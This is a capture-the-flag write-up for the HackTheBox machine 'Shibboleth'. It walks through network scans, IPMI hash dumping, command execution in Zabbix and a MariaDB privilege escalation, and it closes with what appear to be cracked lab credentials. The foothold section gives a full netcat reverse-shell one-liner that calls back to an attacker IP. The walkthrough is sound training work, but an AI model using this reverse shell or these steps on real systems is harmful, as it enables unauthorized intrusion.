# HackTheBox-Shibboleth
## NMAP
```bash
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://shibboleth.htb/
Service Info: Host: shibboleth.htb
```
## PORT 80 (HTTP)
On the web server we see a html template page
We can check the source which reveals that it's a theme so no point in enumerating here, from the nmap scan it did show us that it was redirecting to a domain name so let's try to run `wfuzz` to bruteforce for subdomains
Here it gives us there names, and these all are the same
If we hover over the `help` link , it will show us that it's using version 5 of `zabbix` , which is a tool for monitoring the network and ,virtual machines and other services running. Searching for exploits was a rabbit hole here as it was reported that zabbix 5.x is vulnerable to blind sqli but there wasn't any exploits publicily available.
I went back to scanning the machine and scanend for `UDP` ports
```bash
nmap -p 1-1000 -sU --min-rate 5000 10.129.231.205 -vv
PORT STATE SERVICE REASON
45/udp closed mpm port-unreach ttl 63
179/udp closed bgp port-unreach ttl 63
243/udp closed sur-meas port-unreach ttl 63
422/udp closed ariel3 port-unreach ttl 63
459/udp closed ampr-rcmd port-unreach ttl 63
623/udp open asf-rmcp udp-response ttl 63
892/udp closed unknown port-unreach ttl 63
```
This showed port 623 which was opened and was running `IPMI` Intelligent Platform Management Interface , which is used for controlling and managing hardware services. There was a metasploit module available that can dump `HMAC-SHA1` hashes, so using the module `use auxiliary/scanner/ipmi/ipmi_dumphashes`
And we can now crack this hash using `hashcat`
## Foothold
To get a foolthold , we can run shell commands through Zabbix agent, in order to do this first we'll need to go to `Configuration` and select `Hosts`
Next select the hostname ,which is `shibboleth.htb` , after selecting the hostname , navigate to `items`
Click on create `new item`
When adding a new item , in the `key` field to run command we need to input `system.run["shell command"]` also change type of information to `text`
At the bottom , we can see a button `Test` to check our command
So we have command execution here , now we need to get a reverse shell from here
```bash
system.run["rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.25 2222 >/tmp/f",nowait]
```
We are specifying `nowait` here so it does not close the process
Stabilizing the reverse shell so we may have a tty shell
## Privilege Escalation (ipmi-svc)
I ran `sudo -l` to see if there was any thing this user can run as a different user or as root but we need a password , I tried the zabbix admin password but it failed
We can see another user named `ipmi-svc` , let's try the password that we found for this user
And this worked , we can find the database creds from `/etc/zabbix/zabbix_server.conf`
## Privilege Escalation (root)
After logging in with mysql , it was using `Mariadb` which was using `10.3.25` version, so I searched for if there was any exploit for this version and it returned with a command execution exploit
So first we have to generate a shared library file which can be used in any program at run time , transfer that on the target machine
Start the netcat listener , and login in with mysql user by executing a command
## References
- https://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_dumphashes/
- https://hashcat.net/wiki/doku.php?id=example_hashes
- https://subscription.packtpub.com/book/cloud-and-networking/9781800202238/2/ch02lvl1sec20/using-zabbix-preprocessing-to-alter-item-values
- https://www.zabbix.com/forum/zabbix-help/21803-system-run-syntax
- https://packetstormsecurity.com/files/162177/MariaDB-10.2-Command-Execution.html
-
```
Administrator:ilovepumkinpie1
zabbix:bloooarskybluh
```